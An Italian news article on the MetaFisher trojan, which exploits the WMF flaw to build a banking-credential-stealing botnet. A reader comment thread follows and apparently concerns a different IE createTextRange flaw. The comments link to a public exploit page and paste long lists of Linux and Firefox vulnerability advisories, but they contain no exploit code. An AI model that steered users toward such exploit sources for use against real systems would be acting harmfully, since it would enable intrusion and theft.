Reston (USA) – Il responsabile dell’ultima epidemia telematica che tiene col fiato sospeso centinaia di migliaia d’utenti è un trojan che sfrutta la falla critica nel formato multimediale WMF utilizzato dai prodotti Microsoft . Finora, stando alle stime di VeriSign , il malware potrebbe avere già infettato un milione di computer.
Riconosciuto da Symantec col nome MetaFisher , questo trojan si diffonde attraverso la posta elettronica: basta che un utente ignaro segua il collegamento all’interno del messaggio e MetaFisher si autoinstalla, trasformando il computer in uno zombie , nome comune per indicare il nodo di una botnet .
Il computer infetto entra infatti a fare parte di un complicato sistema che raccoglie e registra ogni transazione finanziaria e ciascuna procedura d’autenticazione effettuata. I dati raccolti vengono poi spediti ad un webserver remoto, totalmente automatizzato: attraverso un complesso programma in PHP, gli untori riescono a filtrare le informazioni sottratte ed individuare i codici identificativi utilizzati per accedere ai servizi bancari telematici .
Ken Dunham, esperto di sicurezza del team iDefense sostiene che “MetaFisher è tra i trojan più sofisticati mai analizzati”. “Abbiamo visto molti tipi di trojan utilizzati per creare botnet e per spiare le attività degli utenti”, dice Dunham, “ma questo utilizza una tecnica talmente raffinata e sofisticata da fare invidia ad un sistema di gestione dati professionale”.
MetaFisher trasmette dati attraverso una connessione criptata , organizza i dati rubati in base al paese di provenienza e tiene nota dell’entità delle pagine web visitate dall’utente infetto, catalogandole in base alle parole chiave contenute. Inoltre, MetaFisher può modificare il proprio comportamento in qualsiasi momento ricevendo ordini impartiti a distanza.
Naturalmente, la migliore forma di prevenzione contro MetaFisher è l’installazione immediata delle patch di sicurezza che correggono la falla WMF. Inoltre, come consiglia lo stesso Dunham, “bisogna ricordare agli utenti di non aprire nessun collegamento sconosciuto contenuto in messaggi di posta elettronica non sicuri”.
Il trojan, stando al rapporto di iDefense, è attualmente in mano a numerose organizzazioni criminali ed esistono già diverse varianti , progettate per colpire in modo specifico le banche di certi utenti.
Secondo le prime indagini, gli untori si troverebbero prevalentemente in Europa e negli Stati Uniti. Un bollettino di sicurezza di Websense parla poi di un malware assai simile e ne attribuisce la paternità ad un anonimo russo.
-
HAHHAHAHHAHAHAHAAH
come da oggetto.Anonimo5 --
prrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr!Anonimonon credo cambi molto
Chi non se ne intende, e' vulnerabile tanto a questa quanto alle altre migliaia di falle in quanto con tutta probabilita' non se ne intende.Chi se ne intende un minimo, fa gli aggiornamenti.Chi se ne intende un po' di piu', e' gia' migrato ad altri browser da tempo (con buona pace dei troll)La domanda vera da porsi su questa domanda e' : e IE7? La notizia dice solo fino a ie6sp1, ma io non sono molto convinto, sebbene molte parti di ie7 siano scritte exnovo, tantissime sono copiaincollate da ie6i troll si aprano un topic a parte grazie, qui si vorrebbe discutere di ie6/7/altribrowserAnonimoRe: non credo cambi molto
- Scritto da: Anonimo> Chi se ne intende un minimo, fa gli aggiornamenti.Eh, ci fossero gli aggiornamenti ... Mica parliamo di prodotti Open Source, per i quali gli aggiornamenti sono disponibili subito, qui si tratta di Microsoft !> La domanda vera da porsi su questa domanda e' : e> IE7?Pare sia vulnerabile pure lui: http://www.milw0rm.com/exploits/1606 Strano, mi aspettavo qualcosa di piu' da questo IE7 ...GiamboRe: non credo cambi molto
- Scritto da: Giambo> > - Scritto da: Anonimo> > > Chi se ne intende un minimo, fa gli> aggiornamenti.> > Eh, ci fossero gli aggiornamenti ... Mica> parliamo di prodotti Open Source, per i quali gli> aggiornamenti sono disponibili subito, qui si> tratta di Microsoft !> > > La domanda vera da porsi su questa domanda e' :> e> > IE7?> > Pare sia vulnerabile pure lui:> http://www.milw0rm.com/exploits/1606 > Strano, mi aspettavo qualcosa di piu' da questo> IE7 ...beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta betaAnonimoRe: non credo cambi molto
- Scritto da: Anonimo> > Strano, mi aspettavo qualcosa di piu' da questo> > IE7 ...> > betaSara' anche una beta, pero' mi aspettavo che riscrivessero o almeno ricontrollassero parti di codice.Invece pare basarsi ancora pesantemente su IE6 ...GiamboRe: non credo cambi molto
- Scritto da: Giambo> > La domanda vera da porsi su questa domanda e' :> e> > IE7?> > Pare sia vulnerabile pure lui:> http://www.milw0rm.com/exploits/1606 > Strano, mi aspettavo qualcosa di piu' da questo> IE7 ...Strano ? IE7 è la modifica di IE6 , anzi avrebbe più bug di IE6 dato che è una beta, inoltre permette più cose ! :| :s :'( .mdaRe: non credo cambi molto
- Scritto da: Giambo> Pare sia vulnerabile pure lui:> http://www.milw0rm.com/exploits/1606 > Strano, mi aspettavo qualcosa di piu' da questo> IE7 ...Quella che indichi tu è un'altra falla non è la stessa e per entrambe le falle, IE7 preview di Marzo non è vulnerabile.Quella che PI riporta oggi è questa: http://www.securityfocus.com/bid/17196/discusshttp://secunia.com/advisories/18680/Microsoft has reported that this issue does not affect the March 20, 2006 release of Internet Explorer 7 Beta 2 Preview. Quella su milw0rm.com è questahttp://secunia.com/advisories/19269/ e si tratta di un DoS e anche in questo caso IE7 preview di Marzo non crasha.AnonimoRe: non credo cambi molto
- Scritto da: Anonimo> Chi non se ne intende, e' vulnerabile tanto a> questa quanto alle altre migliaia di falle in> quanto con tutta probabilita' non se ne intende.> > Chi se ne intende un minimo, fa gli aggiornamenti.peccato che non ci siano ancora...> Chi se ne intende un po' di piu', e' gia' migrato> ad altri browser da tempo (con buona pace dei> troll)quindi? cosa vuoi insegnare? che se uno non se ne intende è giusto che si preda un virus? oppure che se uno sceglie un altro browser, nel caso di bug (perché i bug capitano a tutti...) non c'è bisogno di aggiornare?> La domanda vera da porsi su questa domanda e' : e> IE7? La notizia dice solo fino a ie6sp1, ma io> non sono molto convinto, sebbene molte parti di> ie7 siano scritte exnovo, tantissime sono> copiaincollate da ie6non vedo il problema... quando uscirà la patch, se è come dici tu, la copincolleranno anche su IE7... > i troll si aprano un topic a parte grazie, qui si> vorrebbe discutere di ie6/7/altribrowsermah... non è che il tuo discorso fili più di tantoAnonimo"Potrebbe consentire"
"Potrebbe consentire l'accesso"? Purtroppo il condizionale è un'indicativohttp://www.milw0rm.com/exploits/1606E purtroppo sento già anche l'arrivo dei troll (e parlo da Firefoxiano convinto).Detto per inciso ComputerTerrorism UK afferma di avere un PoC funzionante anche su IE beta 2 (anche se la cosa è da dimostrare... forse il fatto che l'exploit sia già pubblico li porterà a pubblicare anche il loro):Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2Severity: CriticalImpact: Remote System AccessSolution Status: UnpatchedCVE Reference: Awaiting ConfirmationAdvisory Date: 22nd March, 2006==================================Modificato dall'autore il 24/03/2006 0.21.56IppatsuManRe: "Potrebbe consentire"
- Scritto da: IppatsuMan> "Potrebbe consentire l'accesso"? Purtroppo il> condizionale è un'indicativo> > http://www.milw0rm.com/exploits/1606Non è la stessa falla.AnonimoRe: "Potrebbe consentire"
- Scritto da: IppatsuMan> "Potrebbe consentire l'accesso"? Purtroppo il> condizionale è un'indicativo> > http://www.milw0rm.com/exploits/1606Quella che indichi tu è un'altra falla non è la stessa e per entrambe le falle, IE7 preview di Marzo non è vulnerabile.Quella che PI riporta oggi è questa: http://www.securityfocus.com/bid/17196/discuss http://secunia.com/advisories/18680 /Microsoft has reported that this issue does not affect the March 20, 2006 release of Internet Explorer 7 Beta 2 Preview. Quella su milw0rm.com è questahttp://secunia.com/advisories/19269 / e si tratta di un DoS e anche in questo caso IE7 preview di Marzo non crasha.E PI l'ha riportata la scorsa settimana http://punto-informatico.it/p.asp?i=58489AnonimoRe: "Potrebbe consentire"
- Scritto da: Anonimo> > - Scritto da: IppatsuMan> > http://www.milw0rm.com/exploits/1606> > Quella che indichi tu è un'altra falla non è la> stessa e per entrambe le falle, IE7 preview di> Marzo non è vulnerabile.> Quella su milw0rm.com è questa> http://secunia.com/advisories/19269 / e si tratta> di un DoS e anche in questo caso IE7 preview di> Marzo non crasha.(Sperando di non dire caxxate...)No, l'exploit di milw0rm si riferisce al createTextRange() di una checkbox che porta a un remote execution e non a un semplice DoS (ed è proprio http://secunia.com/advisories/18680 ), ed è quello di cui parla PI.Per intenderci: l'exploit di milw0rm sfrutta il SA18680 (che porta a un remote execution) e non il SA19269 (che è un semplice DoS).Microsoft dice che IE 7 beta 2 non è vulnerabile, il creatore dell'exploit dice che lo è.Se qualcuno ne sa qualcosa faccia sapere.(Per la cronaca sul mio pc l'exploit non ha funzionato, suppongo dipenda dal fatto che il PoC è stato fatto su misura per Win XP SP2 in russo, bisognerebbe smanettarci un minimo per controllare)IppatsuManRe: "Potrebbe consentire"
- Scritto da: IppatsuMan> (Sperando di non dire caxxate...)L'hai detta. Quella falla su milworm da te citata NON centra assolutamente niente con "createTextRange()".AnonimoRe: "Potrebbe consentire"
Quella che indichi tu è un'altra falla non è la stessa e per entrambe le falle, IE7 preview di Marzo non è vulnerabile.Quella che PI riporta oggi è questa: http://www.securityfocus.com/bid/17196/discuss http://secunia.com/advisories/18680 /Microsoft has reported that this issue does not affect the March 20, 2006 release of Internet Explorer 7 Beta 2 Preview. Quella su milw0rm.com è quella che PI ha riportato ieri:http://punto-informatico.it/p.asp?i=58489 http://secunia.com/advisories/19269 / e si tratta di un DoS e anche in questo caso IE7 preview di Marzo non crasha.MA SONO 2 FALLE DIVERSE!AnonimoRe: "Potrebbe consentire"
- Scritto da: IppatsuMan> Detto per inciso ComputerTerrorism UK afferma di> avere un PoC funzionante anche su IE beta 2si ma computer terrorism si riferisce ad un'altra falla, non è la stessa.AnonimoRe: "Potrebbe consentire"
- Scritto da: Anonimo> > - Scritto da: IppatsuMan> > Detto per inciso ComputerTerrorism UK afferma di> > avere un PoC funzionante anche su IE beta 2> > si ma computer terrorism si riferisce ad un'altra> falla, non è la stessa.No, si riferisce proprio a createTextRange:http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044300.html (leggere "technical narrative")IppatsuManRe: "Potrebbe consentire"
- Scritto da: IppatsuMan> No, si riferisce proprio a createTextRange:si ma il createtextrange è la falla di oggi, mentre quella dell'altro ieri sul DoS riguarda la incapacità di gestire un elevato numero di eventi tipo OnClick in una pagine.In pratica sono 2 le falle e sono diverse:- quella del DoS da eventi tipo OnClick- quella del createTextRange che è un'altraAnonimoDisattiva...
Per avere IE sicuro:Disattivare ActiveXDisattivare Javascriptil prossimo ?Forse a sto punto se si restava con Mosaic ?krhRe: Disattiva...
Qualcosa contro mosaic ???c'e' solo da portar rispetto a quel browser !!!!AnonimoRe: Disattiva...
ma perchè non a lynx...AnonimoRe: Disattiva...
- Scritto da: krh> Per avere IE sicuro:> > Disattivare ActiveX> Disattivare Javascript> > il prossimo ?> > Forse a sto punto se si restava con Mosaic ?voglio proprio vedere chi disattiva il javascript... ormai è indispensabile.QWRe: Disattiva...
- Scritto da: QW> > - Scritto da: krh> > Per avere IE sicuro:> > > > Disattivare ActiveX> > Disattivare Javascript> > > > il prossimo ?> > > > Forse a sto punto se si restava con Mosaic ?> > voglio proprio vedere chi disattiva il> javascript... ormai è indispensabile.Non è indispensabile, in moltissimi casi puoi tenere javascript disabilitato e abilitarli solo per certi siti in cui ti fidi e che serve avere attivo javascript.Esiste noscript per FF.Per IE credo proprio che te li devi abilitare a mano ogni voltaMaialeRe: Disattiva...
- Scritto da: Maiale> > - Scritto da: QW> > > > - Scritto da: krh> > > Per avere IE sicuro:> > > > > > Disattivare ActiveX> > > Disattivare Javascript> > > > > > il prossimo ?> > > > > > Forse a sto punto se si restava con Mosaic ?> > > > voglio proprio vedere chi disattiva il> > javascript... ormai è indispensabile.> > Non è indispensabile, in moltissimi casi puoi> tenere javascript disabilitato e abilitarli solo> per certi siti in cui ti fidi e che serve avere> attivo javascript.> Esiste noscript per FF.> Per IE credo proprio che te li devi abilitare a> mano ogni voltaOddio solo l' 1% dei siti (disabilitando js) potrebbe funzionare:'( CiaomdaRe: Disattiva...
- Scritto da: krh> Disattivare ActiveX> Disattivare Javascript> > il prossimo ?Disattivare Windows e passare ad un sistema operativo più serio.AnonimoRe: Disattiva...
> Disattivare Windows e passare ad un sistema> operativo più serio.si consiglia Linux o FreeBSDAnonimoRe: Disattiva...
- Scritto da: Anonimo> Disattivare Windows e passare ad un sistema> operativo più serio.quante vulnerabilità ci sono state per linux questo mese?Linux Kernel SDLA IOCTL Unauthorized Local Firmware Access Vulnerability2006-03-24http://www.securityfocus.com/bid/16304Linux Kernel DM-Crypt Local Information Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16301Linux Kernel Sysctl_String Local Buffer Overflow Vulnerability2006-03-24http://www.securityfocus.com/bid/16141Linux Kernel ProcFS Kernel Memory Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16284Linux Kernel IP6_Input_Finish Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16043Linux Kernel Time_Out_Leases PrintK Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15627Linux Kernel ICMP_Push_Reply Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16044Linux Kernel handle_stop_signal Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16856Linux Kernel IPv6 FlowLable Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15729Linux Kernel PTraced Child Auto-Reap Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15625Linux Kernel PTrace CLONE_THREAD Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15642Linux Kernel SET_MEMPOLICY Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16135Linux Kernel mq_open System Call Unspecified Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16283Linux Kernel Console Keymap Local Command Injection Vulnerability2006-03-24http://www.securityfocus.com/bid/15122Linux Kernel Multiple Memory Leak Local Denial Of Service Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15076Linux Orinoco Driver Remote Information Disclosure Vulnerability2006-03-23http://www.securityfocus.com/bid/15085Linux Kernel USB Subsystem Local Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14955Linux Kernel Multiple Security Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15049Linux Kernel 64-Bit SMP Routing_ioctl() Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14902Linux Kernel IPV6 Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15156Linux Kernel SCSI ProcFS Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14790Linux Kernel Sysctl Unregistration Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15365Linux Kernel IPSec Policies Authorization Bypass Vulnerability2006-03-23http://www.securityfocus.com/bid/14609Linux Kernel ISO File System Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14614Linux Kernel Sendmsg() Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14785Linux Kernel Multiple Vulnerabilities2006-03-23http://www.securityfocus.com/bid/12598Linux Kernel Coda_Pioctl Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14967Linux Kernel USB io_edgeport Driver Local Integer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/12102Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities2006-03-23http://www.securityfocus.com/bid/17203Linux Kernel die_if_kernel Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/16993ecc. ecc.AnonimoRe: Disattiva...
E quante per Win?la limitazione a 7000 caratteri mi impedisce di farci stare tutta la tragedia.....AnonimoRe: Disattiva...
- Scritto da: Anonimo> > - Scritto da: Anonimo> > Disattivare Windows e passare ad un sistema> > operativo più serio.> > quante vulnerabilità ci sono state per linux> questo mese?> > Linux Kernel SDLA IOCTL Unauthorized Local> Firmware Access Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16304> > Linux Kernel DM-Crypt Local Information> Disclosure Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16301> > Linux Kernel Sysctl_String Local Buffer Overflow> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16141> > Linux Kernel ProcFS Kernel Memory Disclosure> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16284> > Linux Kernel IP6_Input_Finish Remote Denial Of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16043> > Linux Kernel Time_Out_Leases PrintK Local Denial> of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15627> > Linux Kernel ICMP_Push_Reply Remote Denial Of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16044> > Linux Kernel handle_stop_signal Denial of Service> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16856> > Linux Kernel IPv6 FlowLable Denial Of Service> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15729> > Linux Kernel PTraced Child Auto-Reap Local Denial> of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15625> > Linux Kernel PTrace CLONE_THREAD Local Denial of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15642> > Linux Kernel SET_MEMPOLICY Local Denial of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16135> > Linux Kernel mq_open System Call Unspecified> Denial of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16283> > Linux Kernel Console Keymap Local Command> Injection Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15122> > Linux Kernel Multiple Memory Leak Local Denial Of> Service Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/15076> > Linux Orinoco Driver Remote Information> Disclosure Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15085> > Linux Kernel USB Subsystem Local Denial Of> Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14955> > Linux Kernel Multiple Security Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/15049> > Linux Kernel 64-Bit SMP Routing_ioctl() Local> Denial of Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14902> > Linux Kernel IPV6 Local Denial of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15156> > Linux Kernel SCSI ProcFS Denial Of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14790> > Linux Kernel Sysctl Unregistration Local Denial> of Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15365> > Linux Kernel IPSec Policies Authorization Bypass> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14609> > Linux Kernel ISO File System Denial Of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14614> > Linux Kernel Sendmsg() Local Buffer Overflow> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14785> > Linux Kernel Multiple Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/12598> > Linux Kernel Coda_Pioctl Local Buffer Overflow> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14967> > Linux Kernel USB io_edgeport Driver Local Integer> Overflow Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/12102> > Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory> Disclosure Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/17203> > Linux Kernel die_if_kernel Local Denial of> Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/16993> > ecc. ecc.Ommmiiodddio, presto datemi una copia masterizzata di windos che con tutte 'ste vulnerabilita' ci mettono 5 minuti a farmi diventare il peecee in uno zombie...Ok, non si dovrebbe trascurare nessuna vulnerabilita', comunque trascuriamo i DoS, restano un po' di "Local disclosure" e un "buffer overflow", non so' se usabili per elevare localmente i privilegi di un utente.Non so' se ne sei a conoscenza, ma su windos puoi sfruttare localmente le comunicazioni interprocesso tra le finestre (window) per elevare i privilegi, vulnerabilita' impossibile da risolvere (almeno cosi' e' stato dichiarato sotto giuramento da un dirigente microsoft, Allchin se non ricordo male)...I sorgenti sono la' fuori, se ne hai le competenze puoi controllare la bonta' del codice, e se sei in grado puoi renderlo piu' robusto, con windos non lo puoi fare, devi soltanto aspettare che ti venga fornita una patch, dopo che e' stato fatto il giro dei clienti corporate...Ah, sui progetti a sorgente pubblico/aperto c'e' molta trasparenza, tutte gli errori/falle sono resi pubblici, nei prodotti chiusi sai solo quello che a loro fa' comodo...AnonimoRe: Disattiva...
- Scritto da: Anonimo> > - Scritto da: Anonimo> > Disattivare Windows e passare ad un sistema> > operativo più serio.> > quante vulnerabilità ci sono state per linux> questo mese?> > Linux Kernel SDLA IOCTL Unauthorized Local> Firmware Access Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16304> > Linux Kernel DM-Crypt Local Information> Disclosure Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16301> > Linux Kernel Sysctl_String Local Buffer Overflow> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16141> > Linux Kernel ProcFS Kernel Memory Disclosure> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16284> > Linux Kernel IP6_Input_Finish Remote Denial Of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16043> > Linux Kernel Time_Out_Leases PrintK Local Denial> of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15627> > Linux Kernel ICMP_Push_Reply Remote Denial Of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16044> > Linux Kernel handle_stop_signal Denial of Service> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16856> > Linux Kernel IPv6 FlowLable Denial Of Service> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15729> > Linux Kernel PTraced Child Auto-Reap Local Denial> of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15625> > Linux Kernel PTrace CLONE_THREAD Local Denial of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15642> > Linux Kernel SET_MEMPOLICY Local Denial of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16135> > Linux Kernel mq_open System Call Unspecified> Denial of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16283> > Linux Kernel Console Keymap Local Command> Injection Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15122> > Linux Kernel Multiple Memory Leak Local Denial Of> Service Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/15076> > Linux Orinoco Driver Remote Information> Disclosure Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15085> > Linux Kernel USB Subsystem Local Denial Of> Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14955> > Linux Kernel Multiple Security Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/15049> > Linux Kernel 64-Bit SMP Routing_ioctl() Local> Denial of Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14902> > Linux Kernel IPV6 Local Denial of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15156> > Linux Kernel SCSI ProcFS Denial Of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14790> > Linux Kernel Sysctl Unregistration Local Denial> of Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15365> > Linux Kernel IPSec Policies Authorization Bypass> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14609> > Linux Kernel ISO File System Denial Of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14614> > Linux Kernel Sendmsg() Local Buffer Overflow> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14785> > Linux Kernel Multiple Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/12598> > Linux Kernel Coda_Pioctl Local Buffer Overflow> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14967> > Linux Kernel USB io_edgeport Driver Local Integer> Overflow Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/12102> > Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory> Disclosure Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/17203> > Linux Kernel die_if_kernel Local Denial of> Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/16993> > ecc. ecc.dopo aver letto l'elenco delle vulnerabilita' del kernel (peccato, se ci fosse stato un disegnino le avresti anche capite) e aver terminato le pippe che non sei riuscito a tenere a freno, corri a tapparti il retrotreno prima che ti zombifichino anche quello.Per il futuro consiglio studi approfonditi di informatica (informatica, non clikkete e p2p) e lunghe passegiate all'aria aperta necessarie per ossigenare a dovere la massa cerebrale.AnonimoRe: Disattiva...
come si fa ad disattivare activeX e javascript?AnonimoRe: Disattiva...
- Scritto da: Anonimo> come si fa ad disattivare activeX e javascript?www.opera.compoi una volta installato e lanciato pigia F12, il resto dovrebbe essere intuitivo anche per un utonto.AnonimoRe: Disattiva...
- Scritto da: Anonimo> come si fa ad disattivare activeX e javascript?vai nelle opzioni avanzateAnonimoRe: Disattiva...
>vai nelle opzioni avanzateopzioni avanzate !!!!!!!!!!!!!11ahahahahahaha!!!!!!!!!!!!!!!11ma l'interfaccia about:config dei mozilla likel'hai mai vista ?oppure solo i due miliardi di utenti con gli occhia mandorla hanno un qi sufficente per usarla ?AnonimoAH AH AH EXPLODERBUG
e io dovrei cambiare firefox per exploder???si certo come no!!TrollSpammerRe: AH AH AH EXPLODERBUG
- Scritto da: TrollSpammer> e io dovrei cambiare firefox per exploder???> si certo come no!!stai certo che di falle ci sono anche per il tuo amico firefox. La differenza sta nel fatto che non le sbandierano ai quattro venti ma puntualmente ad ogni versione i buffer overflow e l'esecuzione di codice c'è sempre:Fixed in Firefox 1.5.0.1MFSA 2006-08 "AnyName" entrainment and access control hazardMFSA 2006-07 Read beyond buffer while parsing XMLMFSA 2006-06 Integer overflows in E4X, SVG and CanvasMFSA 2006-05 Localstore.rdf XML injection through XULDocument.persist()MFSA 2006-04 Memory corruption via QueryInterface on Location, Navigator objectsMFSA 2006-03 Long document title causes startup denial of ServiceMFSA 2006-02 Changing postion:relative to static corrupts memoryMFSA 2006-01 JavaScript garbage-collection hazardsFixed in Firefox 1.0.7MFSA 2005-59 Command-line handling on Linux allows shell executionMFSA 2005-58 Firefox 1.0.7 / Mozilla Suite 1.7.12 Vulnerability FixesMFSA 2005-57 IDN heap overrun using soft-hyphensFixed in Firefox 1.0.5/1.0.6MFSA 2005-56 Code execution through shared function objectsMFSA 2005-55 XHTML node spoofingMFSA 2005-54 Javascript prompt origin spoofingMFSA 2005-53 Standalone applications can run arbitrary code through the browserMFSA 2005-52 Same origin violation: frame calling top.focus()MFSA 2005-51 The return of frame-injection spoofingMFSA 2005-50 Exploitable crash in InstallVersion.compareTo()MFSA 2005-49 Script injection from Firefox sidebar panel using data:MFSA 2005-48 Same-origin violation with InstallTrigger callbackMFSA 2005-47 Code execution via "Set as Wallpaper"MFSA 2005-46 XBL scripts ran even when Javascript disabledMFSA 2005-45 Content-generated event vulnerabilitiesFixed in Firefox 1.0.4MFSA 2005-44 Privilege escalation via non-DOM property overridesMFSA 2005-43 "Wrapped" javascript: urls bypass security checksMFSA 2005-42 Code execution via javascript: IconURLFixed in Firefox 1.0.3MFSA 2005-33 Javascript "lambda" replace exposes memory contentsMFSA 2005-34 javascript: PLUGINSPAGE code executionMFSA 2005-35 Showing blocked javascript: popup uses wrong privilege contextMFSA 2005-36 Cross-site scripting through global scope pollutionMFSA 2005-37 Code execution through javascript: faviconsMFSA 2005-38 Search plugin cross-site scriptingMFSA 2005-39 Arbitrary code execution from Firefox sidebar panel IIMFSA 2005-40 Missing Install object instance checksMFSA 2005-41 Privilege escalation via DOM property overridesFixed in Firefox 1.0.2MFSA 2005-32 Drag and drop loading of privileged XULMFSA 2005-31 Arbitrary code execution from Firefox sidebar panelMFSA 2005-30 GIF heap overflow parsing Netscape extension 2Fixed in Firefox 1.0.1MFSA 2005-29 Internationalized Domain Name (IDN) homograph spoofingMFSA 2005-28 Unsafe /tmp/plugtmp directory exploitable to erase user's filesMFSA 2005-27 Plugins can be used to load privileged contentMFSA 2005-26 Cross-site scripting by dropping javascript: link on tabMFSA 2005-25 Image drag and drop executable spoofingMFSA 2005-24 HTTP auth prompt tab spoofingMFSA 2005-23 Download dialog source spoofingMFSA 2005-22 Download dialog spoofing using Content-Disposition headerMFSA 2005-21 Overwrite arbitrary files downloading .lnk twiceMFSA 2005-20 XSLT can include stylesheets from arbitrary hostsMFSA 2005-19 Autocomplete data leakMFSA 2005-18 Memory overwrite in string libraryMFSA 2005-17 Install source spoofing with user:pass@hostMFSA 2005-16 Spoofing download and security dialogs with overlapping windowsMFSA 2005-15 Heap overflow possible in UTF8 to Unicode conversionMFSA 2005-14 SSL "secure site" indicator spoofingMFSA 2005-13 Window Injection SpoofingFixed in Firefox 1.0MFSA 2005-12 javascript: Livefeed bookmarks can steal private dataMFSA 2005-09 Browser responds to proxy auth request from non-proxy ssl serverMFSA 2005-08 Synthetic middle-click event can steal clipboard contentsMFSA 2005-07 Script-generated event can download content without promptingMFSA 2005-05 Input stealing from other tabsMFSA 2005-04 Secure site lock can be spoofed using view-source:MFSA 2005-03 Secure site lock can be spoofed by a binary downloadMFSA 2005-02 Opened attachments are temporarily saved world-readableMFSA 2005-01 Link opened in new tab can load local fileAnonimoRe: AH AH AH EXPLODERBUG
